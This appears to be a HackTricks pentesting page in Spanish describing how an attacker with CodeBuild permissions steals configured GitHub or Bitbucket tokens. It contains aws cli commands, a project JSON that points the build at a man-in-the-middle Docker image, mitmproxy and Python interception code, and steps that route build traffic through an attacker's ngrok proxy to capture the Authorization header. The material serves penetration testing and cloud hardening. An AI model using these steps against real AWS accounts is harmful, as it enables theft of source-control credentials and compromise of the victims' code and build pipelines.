AWS Codebuild - Token Leakage

Support HackTricks

Recuperar Tokens Configurados de Github/Bitbucket

Primero, verifica si hay credenciales de origen configuradas que podrías filtrar:

aws codebuild list-source-credentials

Via Docker Image

Si encuentras que la autenticación, por ejemplo, a Github está configurada en la cuenta, puedes exfiltrar ese acceso (token de GH o token de OAuth) haciendo que Codebuild utilice una imagen de docker específica para ejecutar la construcción del proyecto.

Para este propósito, podrías crear un nuevo proyecto de Codebuild o cambiar el entorno de uno existente para establecer la imagen de Docker.

La imagen de Docker que podrías usar es https://github.com/carlospolop/docker-mitm. Esta es una imagen de Docker muy básica que establecerá las variables de entorno https_proxy, http_proxy y SSL_CERT_FILE. Esto te permitirá interceptar la mayor parte del tráfico del host indicado en https_proxy y http_proxy y confiar en el CERT SSL indicado en SSL_CERT_FILE.

  1. Crea y sube tu propia imagen de Docker MitM

  • Sigue las instrucciones del repositorio para establecer tu dirección IP de proxy y configurar tu certificado SSL y construir la imagen de docker.

  • NO CONFIGURES http_proxy para no interceptar solicitudes al endpoint de metadatos.

  • Podrías usar ngrok como ngrok tcp 4444 para establecer el proxy en tu host.

  • Una vez que tengas la imagen de Docker construida, cárgala en un repositorio público (Dockerhub, ECR...)

  1. Configura el entorno

  • Crea un nuevo proyecto de Codebuild o modifica el entorno de uno existente.

  • Configura el proyecto para usar la imagen de Docker generada previamente.

  1. Configura el proxy MitM en tu host

  • Como se indica en el repositorio de Github, podrías usar algo como:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

La versión de mitmproxy utilizada fue 9.0.1, se informó que con la versión 10 esto podría no funcionar.

  1. Ejecutar la construcción y capturar las credenciales

  • Puedes ver el token en el encabezado de Authorization:

Esto también se podría hacer desde la aws cli con algo como

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

A través del protocolo HTTP

Esta vulnerabilidad fue corregida por AWS en algún momento de la semana del 20 de febrero de 2023 (creo que el viernes). Así que un atacante ya no puede abusar de ella :)

Un atacante con permisos elevados en un CodeBuild podría filtrar el token de Github/Bitbucket configurado o si los permisos se configuraron a través de OAuth, el token temporal de OAuth utilizado para acceder al código.

  • Un atacante podría agregar las variables de entorno http_proxy y https_proxy al proyecto de CodeBuild apuntando a su máquina (por ejemplo http://5.tcp.eu.ngrok.io:14972).

  • Luego, cambiar la URL del repositorio de github para usar HTTP en lugar de HTTPS, por ejemplo: **http://**github.com/carlospolop-forks/TestActions

  • Luego, ejecutar el ejemplo básico de https://github.com/synchronizing/mitm en el puerto señalado por las variables de proxy (http_proxy y https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
  • Finalmente, haz clic en Construir el proyecto, las credenciales serán enviadas en texto claro (base64) al puerto mitm:

Ahora un atacante podrá usar el token desde su máquina, listar todos los privilegios que tiene y (ab)usar más fácilmente que usando el servicio CodeBuild directamente.

Apoya a HackTricks

Last updated